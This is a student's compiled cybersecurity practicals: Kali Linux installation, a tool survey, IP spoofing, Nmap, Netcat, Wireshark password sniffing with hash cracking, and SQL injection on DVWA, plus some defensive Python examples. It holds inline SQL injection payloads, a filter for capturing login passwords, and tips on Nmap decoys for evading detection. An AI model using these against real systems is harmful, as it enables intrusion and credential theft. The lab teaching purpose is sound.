CS Final

This document provides instructions on installing Kali Linux and examines some of the key tools available in Kali Linux for cybersecurity purposes. It outlines the installation process, including downloading the ISO, setting up disk partitioning, and configuring user accounts and network settings. The document also provides system requirements and an overview of some popular tools in Kali Linux for information gathering (like Traceroute, WhatWeb, Nmap) and vulnerability scanning.

Uploaded by Lucky Khuha

PRACTICAL – 1

Aim: Install Kali Linux. Examine the utilities and tools available in Kali
Linux and find out which tool is the best for finding cyber attacks/vulnerabilities.

Installing Kali Linux

Installing Kali Linux (single boot) on your computer is an easy process. This
guide will cover the basic install (which can be done on bare metal or guest
VM), with the option of encrypting the partition. At times, you may have
sensitive data you would prefer to encrypt using Full Disk Encryption (FDE).
During the setup process you can initiate an LVM encrypted install on either
Hard Disk or USB drives.

First, you’ll need compatible computer hardware. Kali Linux is supported on
amd64 (x86_64/64-Bit) and i386 (x86/32-Bit) platforms. Where possible,
we would recommend using the amd64 images. The hardware
requirements are minimal as listed in the section below, although better
hardware will naturally provide better performance. You should be able to
use Kali Linux on newer hardware with UEFI and older systems with BIOS.

Our i386 images use a PAE kernel by default, so you can run them on
systems with over 4 GB of RAM.

In our example, we will be installing Kali Linux in a fresh guest VM, without
any existing operating systems pre-installed. We will explain other possible
scenarios throughout the guide.

System Requirements

The installation requirements for Kali Linux will vary depending on what you
would like to install and your setup. For system requirements:

• On the low end, you can set up Kali Linux as a basic Secure Shell
(SSH) server with no desktop, using as little as 128 MB of RAM (512 MB
recommended) and 2 GB of disk space.
• On the higher end, if you opt to install the default Xfce4 desktop and
the kali-linux-default metapackage, you should really aim for at least 2 GB
of RAM and 20 GB of disk space.
  o When using resource-intensive applications such as Burp
Suite, its developers recommend at least 8 GB of RAM (and even more for a
large web application), and likewise when running several programs at the
same time.

Installation Prerequisites

This guide will also make the following assumptions when installing Kali
Linux:

• Using the amd64 installer image.
• CD/DVD drive / USB boot support.
• Single disk to install to.
• Connected to a network (with DHCP & DNS enabled) which has
outbound Internet access.

We will be wiping any existing data on the hard disk, so please back up any
important information on the device to external media.

Preparing for the Installation

1. Download Kali Linux (we recommend the image marked Installer).
2. Burn the Kali Linux ISO to DVD or image Kali Linux Live to a USB
drive. (If you cannot, check out the Kali Linux Network Install.)
3. Back up any important information on the device to external media.
4. Ensure that your computer is set to boot from CD/DVD/USB in your
BIOS/UEFI.

Kali Linux Installation Procedure

Boot

1. To start your installation, boot with your chosen installation medium.
You should be greeted with the Kali Linux Boot screen. Choose
either Graphical install or Install (Text-Mode). In this example, we
chose the Graphical install.

Language

2. Select your preferred language. This will be used for both the setup
process and once you are using Kali Linux.

3. Specify your geographic location.

4. Select your keyboard layout.

Network

5. The setup will now probe your network interfaces, look for a DHCP
service, and then prompt you to enter a hostname for your system. In
the example below, we’ve entered kali as our hostname.
• If there isn’t a DHCP service running on the network, it will ask you to
enter the network information manually after probing for network
interfaces, or you can skip this step.
• If Kali Linux doesn’t detect your NIC, you either need to include the
drivers for it when prompted, or generate a custom Kali Linux ISO with
them pre-included.
• If the setup detects multiple NICs, it may prompt you which one to use
for the install.
• If the chosen NIC is 802.11 based, you will be asked for your wireless
network information before being prompted for a hostname.

6. You may optionally provide a default domain name for this system to
use (values may be pulled in from DHCP or from a pre-existing
operating system).

User Accounts

7. Next, create the user account for the system (full name, username
and a strong password).

Clock

8. Next, set your time zone.


Disk

9. The installer will now probe your disks and offer you various choices,
depending on the setup.

In our guide, we are using a clean disk, so we have four options to pick
from. We will select Guided - use entire disk: this is a single-boot
installation of Kali Linux, we do not want any other operating system
installed, and so we are happy to wipe the disk.

If there is pre-existing data on the disk, you will have an extra
option (Guided - use the largest continuous free space) compared to the
example below. This instructs the setup not to alter any existing data, which
is ideal for dual-booting with another operating system. As this is not the
case in this example, it is not visible.

Experienced users can use the “Manual” partitioning method for more
granular configuration options, which is covered in more detail in our BTRFS
guide.

If you want to encrypt Kali Linux, you can enable Full Disk Encryption (FDE)
by selecting Guided - use entire disk and set up encrypted LVM. When
selected, the installer will later in the setup (not shown in this guide) prompt
you to enter a password (twice). You will have to enter this password every
time you start up Kali Linux.
10. Select the disk to be partitioned.

11. Depending on your needs, you can choose to keep all your files
in a single partition - the default - or to have separate partitions for
one or more of the top-level directories.

If you’re not sure which you want, choose “All files in one partition”.

12. Next, you’ll have one last chance to review your disk
configuration before the installer makes irreversible changes. After you
click Continue, the installer will go to work and you’ll have an almost
finished installation.

Encrypted LVM

If enabled in the previous step, Kali Linux will now start to perform a secure
wipe of the hard disk, before asking you for an LVM password.

Please use a strong password; otherwise you will have to agree to the warning
about a weak passphrase.

Proxy Information

13. Kali Linux uses a central repository to distribute applications.
You’ll need to enter any appropriate proxy information as needed.

Metapackages

14. Next you can select which metapackages you would like to install. The
default selections will install a standard Kali Linux system and you
don’t really have to change anything here.

Please refer to this guide if you prefer to change the default selections.

Boot Information

15. Next, confirm to install the GRUB boot loader.

16. Select the hard drive to install the GRUB bootloader on (by default
no drive is selected).

Reboot

17. Finally, click Continue to reboot into your new Kali Linux
installation.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your
system.

The General Use section has more information and you can also find tips on
how to get the most out of Kali Linux in our User Forums.

Introduction to Kali Linux tools list

The Kali Linux tools list is the set of tools shipped with the Kali Linux
distribution that help users perform penetration testing; it is a large part
of why Kali Linux is the most recommended distribution for ethical hackers
around the world. The use of these tools is not restricted to ethical hacking:
for a webmaster, many of them are equally efficient and worthwhile. They
support users in penetration testing, hacking and digital forensics tasks.
Whoever uses the tools and whatever the purpose, the list discussed here
covers the top tools in Kali Linux.

List of Kali Linux tools and explanation of each:

Most of the tools we will talk about come pre-installed in Kali Linux. If
you do not find a tool pre-installed in the distribution, you can easily
download and install it. The list here covers every phase of the
penetration testing cycle, i.e. reconnaissance, scanning, exploitation and
post-exploitation. We focus on some important tools, as covering all of them
would be an endless discussion given how many exist. Without further ado,
here is the list, grouped according to the tools' purpose.

1. Gathering Information

• Traceroute: This is a network diagnostic utility in Kali Linux. It shows
the route a connection takes and measures the transit delays of packets
across an IP network.
• WhatWeb: This information gathering utility works like a website
fingerprinter. It is analogous to an interrogator who questions a website to
find out what it is built of. WhatWeb has around 1800 plugins, each
with its own purpose.
• Nmap: Another frequently used tool is Nmap, which is used for network
discovery and security auditing. Its options include reporting each open
port available on the target.
• Dirbuster: As the name signifies, this tool busts hidden objects, files
or directories present on a website. A dictionary-based attack is launched
with a set of preconfigured word lists, and the responses are analysed to
find the hidden gem!

2. Analysis of Web Application

• SQLiv: This is one of the most common tools for simple and massive
SQL injection vulnerability scanning. It is one of the few tools in this list
that does not come pre-installed in the Kali Linux distribution, yet it is still
widely used!
• BurpSuite: Another addition to web application analysis, this is a
collection of tools bundled into a single suite for web application security
testing, starting from scratch, i.e. from analysis of the attack surface.
• OWASP-ZAP: This is a Java based tool for testing web application
security with an intuitive GUI for tasks that include fuzzing, spidering and
scripting, along with a number of plugins to ease the task in hand.

3. Analysis of Vulnerability

• Nikto: One of the common tools used for assessing vulnerabilities and
security threats. This tool can scan for 6500+ potentially dangerous files
or programs.

4. Password attacks

• Hash-identifier: This tool helps users identify the various hash types
used to protect data and passwords. Alongside this tool, another tool named
findmyhash is used for cracking the hash using online services. Say we
obtain a hash value: it is put through hash-identifier to figure out the
hash type, and then findmyhash recovers the original string.
• Crunch: This utility allows users to create custom wordlists. With a
standard character set or a specified one, all sorts of permutations and
combinations are generated for use in password attacks.
• John the Ripper: Another widely used offline password cracking tool
that combines a lot of password crackers into a single package. It takes
care of identifying the hash type, customising the cracker and much more,
all in offline mode.

5. Assessing Database

• SQLMap: This is one of the most widely used tools for database
assessment, automating the detection and exploitation of SQL injection
vulnerabilities, which can lead to taking over the database. To do this,
we might first need to find a website that is vulnerable to SQL injection,
for which another tool discussed above, SQLiv, will come in handy!

6. Wireless attack

• Aircrack-NG suite: As the name suggests, this is a suite: a scanner,
a WEP and WPA/WPA2-PSK cracker, a packet sniffer and an analysis tool are
threaded together to crack or identify vulnerabilities in wireless media!
The suite consists of 16 sub-tools.
• Fluxion: This tool creates a clone of the target Wi-Fi network. When a
user connects to the cloned network, an authentication window pops up; the
user enters the password, which is then captured!

7. Spoofing & Sniffing

• Wireshark: This is another great and widely used network analyser for
security auditing. Wireshark performs general packet filtering using display
filters, including ones to pick out a captured password.
• BetterCAP: Another great tool for performing man in the middle attacks
against a network. This is achieved by manipulating HTTP, HTTPS and TCP
traffic in real time, credential sniffing and much more!

8. Keeping anonymity

• MacChanger: When performing the different tasks mentioned above, we
must make sure that our identity is not disclosed; it would be foolish to
overlook any precaution. This tool changes the user’s MAC address so as to
keep the identity anonymous!

PRACTICAL – 2

Aim: Evaluate network defense tools for the following: (i) IP spoofing;
(ii) difference between DDoS attack and DoS attack.

(i) IP Spoofing

IP spoofing is essentially a technique used by hackers to gain
unauthorized access to computers. The concept of IP spoofing was initially
discussed in academic circles as early as 1980. IP spoofing attacks
had been known to security experts on a theoretical level. It was primarily
theoretical until Robert Morris discovered a security weakness in the TCP
protocol known as sequence prediction. Occasionally IP spoofing is done to
mask the origin of a DoS attack. In fact, DoS attacks often mask the actual
IP address from which the attack originated.

Process:
With IP spoofing, an intruder sends a message to a computer system with an IP
address indicating that the message is coming from a different IP address than
the one it is actually coming from. If the intent is to gain unauthorized access,
the spoofed IP address will be that of a system the target considers a trusted
host. To successfully perpetrate an IP spoofing attack, the hacker must find the
IP address of a machine that the target system considers a trusted source.
Hackers might employ a variety of techniques to find the IP address of a trusted
host. After they have obtained a trusted IP address, they can modify the packet
headers of their transmission so that it appears the packets are coming from
that host.

Different ways to address IP spoofing include:

1. Do not reveal any information regarding your internal IP
addresses. This helps prevent those addresses from being “spoofed”.
2. Monitor incoming IP packets for signs of IP spoofing using network
monitoring software. One popular product, “Netlog”, along with
similar products, looks for incoming packets on the external interface that
have both source and destination IP addresses in your local domain.
This essentially means an incoming packet that claims to be from inside
the network is actually coming from outside your network. Finding one
means that an attack is underway.

The danger of IP spoofing is that some firewalls do not examine
packets that appear to come from an internal IP address. Routing packets
through a filtering router is possible if it is not configured to filter
incoming packets whose source address is in the local domain.
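As an added example (not part of the original practical), the following Python implements the Netlog-style rule from item 2 above: a packet that arrives on the external interface carrying a source address from the internal range is flagged as spoofed. It also adds the mirror-image egress check in the style of BCP 38 (a packet leaving through the external interface must carry one of our own addresses), which goes beyond the text. The interface name, the internal prefixes and the packet headers are all constructed for the example.

```python
import ipaddress

# Constructed assumptions for this example: the site's internal address
# space and the name of the Internet-facing interface.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16"),
                 ipaddress.ip_network("10.0.0.0/8")]
EXTERNAL_IFACE = "eth0"


def is_internal(addr):
    """True if addr falls inside one of the site's internal prefixes."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify(pkt):
    """Return a reason string if the packet looks spoofed, else None.

    pkt is a dict with 'iface', 'direction' ('in' or 'out'), 'src', 'dst'.
    ingress rule (the Netlog rule from the text): a packet entering on the
      external interface must not carry an internal source address.
    egress rule (BCP 38 style, beyond the text): a packet leaving through the
      external interface must carry one of our own addresses as source,
      otherwise someone inside is spoofing a third party.
    """
    if pkt["iface"] != EXTERNAL_IFACE:
        return None  # traffic on LAN-side interfaces is not judged here
    if pkt["direction"] == "in" and is_internal(pkt["src"]):
        return "ingress: internal source %s arrived from outside" % pkt["src"]
    if pkt["direction"] == "out" and not is_internal(pkt["src"]):
        return "egress: foreign source %s leaving our network" % pkt["src"]
    return None


def find_spoofed(packets):
    """Return (index, reason) for every packet the two rules flag."""
    hits = []
    for i, pkt in enumerate(packets):
        reason = classify(pkt)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample of packet headers as a monitor on the router would see them.
SAMPLE_PACKETS = [
    {"iface": "eth0", "direction": "in",  "src": "203.0.113.5",  "dst": "192.168.1.10"},  # normal inbound
    {"iface": "eth0", "direction": "in",  "src": "192.168.1.50", "dst": "192.168.1.10"},  # spoofed ingress
    {"iface": "eth0", "direction": "out", "src": "192.168.1.10", "dst": "198.51.100.7"},  # normal outbound
    {"iface": "eth0", "direction": "out", "src": "198.51.100.9", "dst": "203.0.113.5"},   # spoofed egress
    {"iface": "eth1", "direction": "in",  "src": "192.168.1.50", "dst": "192.168.1.10"},  # LAN side, fine
]

if __name__ == "__main__":
    for idx, why in find_spoofed(SAMPLE_PACKETS):
        print("packet %d: %s" % (idx, why))
```

The same two rules are what an ingress/egress ACL on the border router enforces; running them over a packet capture, as here, is how you verify the router is actually doing it.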

Examples of router configurations that are potentially vulnerable include:

1. Routers to external networks that support multiple internal interfaces.
2. Proxy firewalls where the proxy applications use the source IP address for
authentication.
3. Routers with two interfaces that support sub-netting on the internal
network.
4. Routers that do not filter packets whose source address is in the local
domain.

(ii) Difference between DoS and DDoS attack

| DoS | DDoS |
|---|---|
| DoS stands for Denial of Service attack. | DDoS stands for Distributed Denial of Service attack. |
| In a DoS attack a single system targets the victim system. | In a DDoS attack multiple systems attack the victim system. |
| A DoS attack is slower than a DDoS attack. | A DDoS attack is faster than a DoS attack. |
| It can be blocked easily as only one system is used. | It is difficult to block this attack as multiple devices are sending packets and attacking from multiple locations. |
| In a DoS attack, only a single device is used with DoS attack tools. | In a DDoS attack, bots are used to attack at the same time. |
| DoS attacks are easy to trace. | DDoS attacks are difficult to trace. |
| The volume of traffic in a DoS attack is less compared to DDoS. | DDoS attacks allow the attacker to send massive volumes of traffic to the victim network. |
| Types of DoS attacks are: 1. Buffer overflow attacks 2. Ping of Death or ICMP flood 3. Teardrop attack | Types of DDoS attacks are: 1. Volumetric attacks 2. Fragmentation attacks 3. Application layer attacks |
| The victim PC is loaded with packets of data sent from a single sender location. | The victim PC is loaded with packets of data sent from multiple locations. |

Conclusion:

1. IP spoofing attacks are becoming less frequent.
2. This is primarily because the venues they use have become more secure
and in some cases are no longer used.
3. Spoofing can still be used, and all security administrators should
address it.

PRACTICAL – 3

Aim: Explore the Nmap tool and list how it can be used for
network defence

NMAP/Zenmap:

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform
(Linux, Windows, Mac OS X, BSD, etc.) free and open source application
which aims to make Nmap easy for beginners to use while providing
advanced features for experienced Nmap users. Frequently used scans can
be saved as profiles to make them easy to run repeatedly. A command
creator allows interactive creation of Nmap command lines. Scan results can
be saved and viewed later. Saved scan results can be compared with one
another to see how they differ. The results of recent scans are stored in a
searchable database.

How it works:

You can install Zenmap using the following apt-get command:

Zenmap sends commands to the platform-specific nmap executable and pipes the
output back. Zenmap makes it easy to build out command line options like
this.

It ships with some handy pre-set profiles, such as Intense scan, which scans
hosts with “all advanced/aggressive options,” Quick scan, which scans hosts
without those advanced options, and Slow comprehensive scan, which is
exactly as it sounds.

Type the following command to start Zenmap:

Defining a target:

• Every scan must be associated with a specific target, which can be a
single host, a range of hosts, or a full subnet. You can scan a network IP
range by specifying the target as:
  192.168.233.0/24

• Reporting window: Zenmap provides different tabs for reporting on
scan results.

• Profile: Frequently used scans can be saved as profiles to make
them easy to run repeatedly.

• Scan: Initiates a scan based on the current configuration as displayed in
the GUI window.

• Command: Not a fan of command line tools? The command creator
allows interactive creation of Nmap command lines.


Useful tools:

The Compare Results tool provides an interface for differentiating between
two scans, which can be used to monitor daily changes in network topology
or available hosts.

• Saving scans: This comes in handy when you perform a large scan and do
not want to repeat the scan later while reviewing results.

[Figure: A sample XML report generated by Zenmap]
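The Compare Results feature is the defensive use of Nmap this practical asks about: a saved baseline scan diffed against today's scan shows hosts that appeared or vanished and ports that opened or closed. The following Python is an added example, not Zenmap's own code and simpler than Nmap's ndiff, that performs that comparison on two Nmap XML reports (the format nmap -oX writes and Zenmap saves). Both XML documents are constructed inline and trimmed to the elements the code reads; the addresses are made up.

```python
import xml.etree.ElementTree as ET

# Two constructed Nmap XML reports (nmap -oX format), trimmed to the elements
# this example reads. Addresses and services are made up for the example.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.233.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.233.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
    </ports></host>
</nmaprun>"""

TODAY_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="192.168.233.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="down"/><address addr="192.168.233.20" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="192.168.233.30" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
    </ports></host>
</nmaprun>"""


def parse_open_ports(xml_text):
    """Map each host that is up to the set of (protocol, port) it has open."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts are treated as absent
        addr = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
        if addr is None:
            continue
        open_ports = set()
        ports = host.find("ports")
        if ports is not None:
            for p in ports.findall("port"):
                state = p.find("state")
                if state is not None and state.get("state") == "open":
                    open_ports.add((p.get("protocol"), int(p.get("portid"))))
        result[addr] = open_ports
    return result


def diff_scans(old_xml, new_xml):
    """Report hosts and open ports that changed between two scans."""
    old = parse_open_ports(old_xml)
    new = parse_open_ports(new_xml)
    report = {
        "new_hosts": sorted(set(new) - set(old)),
        "gone_hosts": sorted(set(old) - set(new)),
        "opened": {},
        "closed": {},
    }
    for addr in set(old) & set(new):
        opened = new[addr] - old[addr]
        closed = old[addr] - new[addr]
        if opened:
            report["opened"][addr] = sorted(opened)
        if closed:
            report["closed"][addr] = sorted(closed)
    return report


if __name__ == "__main__":
    for key, value in diff_scans(BASELINE_XML, TODAY_XML).items():
        print("%-10s %s" % (key + ":", value))
```

Run daily against a saved baseline, a newly opened port such as the 3389 in the sample is exactly the change that warrants a ticket before an attacker's scan finds it.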
Custom profiles:

The Profile Editor window contains the following tabs:

• Profile: The name and description of your profile
• Scan: The most important tab, where you can specify targets, scan
type (TCP, UDP, IP), timing template, and much more
• Ping: Specifies ping behaviour. You can suppress pings or build a
specific ICMP packet
• Scripting: Include Nmap scripts in your scan. Zenmap comes with
many useful scripts
• Target: Allows for greater target specification flexibility, including
excluded hosts, target list files, and fast scan support
• Source: Specify how you would like the scanner to behave with
respect to scanning identity, IP address, port, and interface
• Other: Includes options for verbosity level, TTL, and other scanner
behaviours
• Timing: Defines the timing profile with respect to maximum scan time,
scan delay, and timeouts, among other things

Using saved profiles also ensures that when comparing two scan results you
are working from the same scan options. One of my favourite options in the
Source tab is to use decoys to hide identity. Decoys lessen the chances of
being caught, and do so even better when used in conjunction with IP
spoofing (also available in the Source tab).

Use the Profile Editor to develop custom profiles that meet your enterprise
needs.
PRACTICAL - 4

Aim: Explore the NetCat tool.

Netcat is a great network utility for reading from and writing to network
connections using the TCP and UDP protocols. Netcat is often referred to as
the Swiss army knife of networking tools and we will be using it a lot
throughout the different tutorials on Hacking Tutorials. The most common uses
for Netcat when it comes to hacking are setting up reverse and bind shells,
piping and redirecting network traffic, port listening, debugging programs and
scripts, and banner grabbing. In this tutorial we will be learning how to use
the basic features of Netcat such as:
• Banner grabbing
• Raw connections
• Webserver interaction
• File transfers

We will demonstrate these techniques using a couple of virtual machines
running Linux and through some visualization.

Banner grabbing, raw connections and webserver interaction:

Service banners are often used by system administrators for inventory
taking of systems and services on the network. The service banners identify
the running service and often the version number too. Banner grabbing is a
technique to retrieve this information about a particular service on an open
port and can be used during a penetration test for performing a vulnerability
assessment. When using Netcat for banner grabbing you actually make a
raw connection to the specified host on the specified port. When a banner is
available, it is printed to the console. Let’s see how this works in practice.

Netcat banner grabbing:

The following command is used to grab a service banner (make a raw
connection to a service):

Let’s try this on the FTP service on Metasploitable 2 which is running on port
21:

As we can see there is a vsFTPd service running on port 21. Have a look at
the service enumeration tutorial if you want to learn more about this subject.

Netcat raw connection:

To demonstrate how a raw connection works we will issue some FTP
commands after we’re connected to the target host on the FTP service. Let’s
see if anonymous access is allowed on this FTP server by issuing the USER
and PASS commands followed by anonymous.

This example demonstrates how to grab a banner and how to set up and use
a raw data connection. In this example we’ve used an FTP service but this
also works on other services such as SMTP and HTTP.

Web server interaction:

Netcat can also be used to interact with webservers by issuing HTTP
requests. With the following command we can grab the banner of the web
service running on Metasploitable 2:

And then run this HTTP request:

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu)
DAV/2 and the PHP version.

To retrieve the top level page on the webserver we can issue the following
command:

And then run this HTTP request:

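The banner-grab and HTTP-request steps above rely on screenshots that are not reproduced here and on a Metasploitable 2 VM. As an added example, not the tutorial's own code, the following Python does what nc does in those steps: open a raw TCP connection, optionally send a probe (such as a HEAD request typed by hand), and read whatever the service returns. It starts throwaway local services so it runs offline; their banners are constructed (the Apache string is the one quoted above, the vsFTPd version is a placeholder). From the inventory side, the same function tells you which of your own services leak a version string to anyone who connects.

```python
import socket
import threading


def grab_banner(host, port, probe=b"", timeout=2.0, max_bytes=1024):
    """Open a raw TCP connection like `nc host port`, optionally send a probe
    and return the first bytes the service replies with, as text. Returns ""
    if the service says nothing before the timeout (many services, HTTP
    included, only talk after the client has sent something)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if probe:
            sock.sendall(probe)
        try:
            data = sock.recv(max_bytes)
        except socket.timeout:
            return ""
    return data.decode("utf-8", errors="replace").strip()


def http_server_header(host, port):
    """Send a minimal HEAD request (what you would type into nc by hand) and
    pull the value of the Server: header out of the response, or None."""
    probe = b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n"
    reply = grab_banner(host, port, probe=probe)
    for line in reply.splitlines():
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None


# --- Throwaway local services so the example runs offline (constructed) ---

def start_fake_service(handler):
    """Listen on 127.0.0.1 on an OS-chosen port; each connection is handed to
    handler(conn) in a daemon thread. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    handler(conn)
                except OSError:
                    pass

    threading.Thread(target=loop, daemon=True).start()
    return port


def ftp_like(conn):
    # Speaks first, as vsftpd on port 21 does. Constructed banner, not a real version.
    conn.sendall(b"220 (vsFTPd example-version)\r\n")


def http_like(conn):
    # Waits for a request, then answers. The Server value is the one quoted above.
    conn.recv(1024)
    conn.sendall(b"HTTP/1.0 200 OK\r\n"
                 b"Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
                 b"Content-Length: 0\r\n\r\n")


def silent(conn):
    # Never sends anything; blocks until the client gives up and closes.
    conn.recv(1)


if __name__ == "__main__":
    ftp_port = start_fake_service(ftp_like)
    web_port = start_fake_service(http_like)
    mute_port = start_fake_service(silent)
    print("ftp banner :", grab_banner("127.0.0.1", ftp_port))
    print("web server :", http_server_header("127.0.0.1", web_port))
    print("silent port:", repr(grab_banner("127.0.0.1", mute_port, timeout=0.5)))
```

The timeout branch matters in practice: a port that accepts the connection but says nothing is still open, and `nc -v` reports it as such, so an empty banner is a result, not an error.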
File transfers with Netcat:

In this example we will be using a Netcat connection to transfer a text file.
Let’s assume we have remote command execution on the target host and we
want to transfer a file from the attack box to the host. First we would need
to set up a listener on the target host and connect to it from the attack box.
We will be using port 8080 for this purpose and we save the file to the
desktop:

As we can see here the contents of the files are equal, which means it has
been transferred from the attack box to the target host.

Conclusion:

In the first part of the Hacking with Netcat tutorials we have learned how to
work with several basic features like raw connections, banner grabbing and
file transfers. We have learned how to grab service banners which contain
information about the service running on the specific port. We have also
learned how to interact with services by using raw connections and Netcat.
In the tutorial we have gained anonymous access to an FTP server using a
raw data connection and issued some FTP commands. We have also learned
how to use Netcat for interaction with a webserver. We are able to retrieve
webpages and send HTTP requests. Last but not least, we have learned how
to transfer files from one box to another with Netcat.

PRACTICAL – 5

Aim: Use the Wireshark tool and explore the packet format and
content at each OSI layer.

Wireshark is the world’s foremost network protocol analyzer. It lets you see
what’s happening on your network at a microscopic level. It is the de facto
(and often de jure) standard across many industries and educational
institutions.

This tutorial can be an angel and also a devil at the same time; it depends on
you, who use this tutorial, and for which purpose. As the writer of this tutorial
I just hope that all of you can use it in the right way, because I believe that
none of you want your password sniffed by someone out there, so don’t
do that to others either.

Disclaimer:

Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning
new skills. We only recommend that you test this tutorial on a system that belongs to
YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to
use this to attempt to hack systems that do not belong to them.

Requirements:
• Wireshark Network Analyzer (wireshark.org)
• Network Card (Wi-Fi Card, LAN Card, etc.) FYI: for Wi-Fi it should
support promiscuous mode


Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to
Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies
to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.
Ideally you could just press the Start button here and Wireshark will start
capturing traffic. In case you missed this, you can always capture traffic by
going back to


Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it.
I opened a browser and signed in to a website using my username and
password. When the authentication process was complete and I was logged
in, I went back and stopped the capture in Wireshark.

When you type in your username and password and press the Login button, it
generates a POST method (in short, you’re sending data to the remote
server).

To filter all traffic and locate POST data, type the following in the filter
section:
http.request.method == "POST"

See the screenshot below. It is showing 1 POST event.
Step 3: Analyze POST data for username and password

Now right click on that line and select Follow TCP Stream.

This will open a new window that contains something like this:

So in this case,
username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real
password. It must be a hash value.

To crack this password is simple: just open a new terminal window and type
this:

And it looks like this:

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion:

Wireshark is a great piece of free open source software for network
monitoring and it is a fantastic packet sniffer. It was created by Gerald
Combs, a computer science graduate, during his education. In the late
1990s it was known as Ethereal and was used to capture and analyse
packets.

PRACTICAL – 7

Aim: Examine SQL injection attack.

What is SQL injection (SQLi)?

SQL injection is one of the most common attacks used by hackers to exploit
any SQL database-driven web application. It’s a technique where SQL
code/statements are inserted in the execution field with the aim of altering
the database contents, dumping useful database contents to the hacker,
causing repudiation issues, spoofing identity, and much more.

Let’s take a simple scenario where we have a web application with a login
form with username and password fields. If the developer used PHP for
development, the code would look like this:

If a user Karen with the password ‘12345’ wanted to log in, after clicking
the Submit or the Log in button, the query that would be sent to the
database would look like this:

If an attacker knew the username and wanted to bypass the login window,
they would put something like Karen;-- in the username field. The resulting
SQL query would look like this:

What the attacker has done is add the -- (double dash), which comments out
the rest of the SQL statement. The above query will return the information
entered in the password field, making it easier for the attacker to bypass the
login screen.

 
How to prevent SQL injection
The main reason that makes websites vulnerable to SQL injection attacks
can be traced back to the web development stage. Some of the techniques
that can be implemented to prevent SQL injection include:
 Input validation: If the website allows user input, this input should be
verified whether it’s allowed or not.
 Parametrized queries: This is a technique where the SQL statements
are precompiled and all you have to do is supply the parameters for
the SQL statement to be executed.
 Use Stored procedures
 Use character-escaping functions
 Avoid administrative privileges - Don't connect your application to the
database using an account with root access
 Implement a Web application firewall (WAF)
Any penetration tester who wants to get started or advance their skills in
SQL injection will need a vulnerable platform to practice. There are many
vulnerable applications available both for offline and online use.
In this particular tutorial, we will focus on the Damn Vulnerable Web
Application (DVWA).
Prerequisites
This tutorial expects that you have an up-and-running DVWA setup. If you
have not yet installed DVWA on your Kali Linux system, please check out the
article which gives a step-by-step guide.
 

Step 1: Set up DVWA for SQL Injection

After successfully installing DVWA, open your browser and enter the URL
127.0.0.1/dvwa/login.php. Log in using the username "admin" and the
password "password"; these are the default DVWA login credentials. After a
successful login, set the DVWA security level to Low, then click on SQL
Injection in the left-side menu.
Step 2: Basic Injection
On the User ID field, enter “1” and click Submit. That is supposed to print
the ID, First_name, and Surname on the screen as you can see below.
The SQL syntax being exploited here is:

Interestingly, when you check the URL, you will see that it contains an
injectable parameter, the ID. Currently, my URL looks like this:
Changing the ID parameter in the URL to 2, 3, 4 and so on returns the
First_name and Surname of each of those users, as follows:

If you were executing this command directly on the DVWA database, the
query for User ID 3 would look like this:

Step 3: Always True Scenario

An advanced method to extract all the First_names and Surnames from the
database would be to use the input: %' or '1'='1
The percentage % sign does not equal anything and will be false.
The '1'='1' condition is registered as true since 1 will always equal 1. If
you were executing that on a database, the query would look like this:

Step 4: Display Database Version

To find out the database version the DVWA application is running on, enter
the text below in the User ID field.
The database version will be listed under surname in the last line, as shown
in the image below.

Step 5: Display Database User

To display the database user who executed the PHP code powering the
database, enter the text below in the User ID field.

The database user is listed next to the surname field in the last line, as
in the image below.
Step 6: Display Database Name
To display the database name, we will inject the SQL code below in the User
ID field.

The database name is listed next to the surname field in the last line.
Step 7: Display all tables in information_schema
The Information Schema stores information about tables, columns, and all
the other databases maintained by MySQL. To display all the tables present
in the information_schema, use the text below.
Step 8: Display all the user tables in information_schema
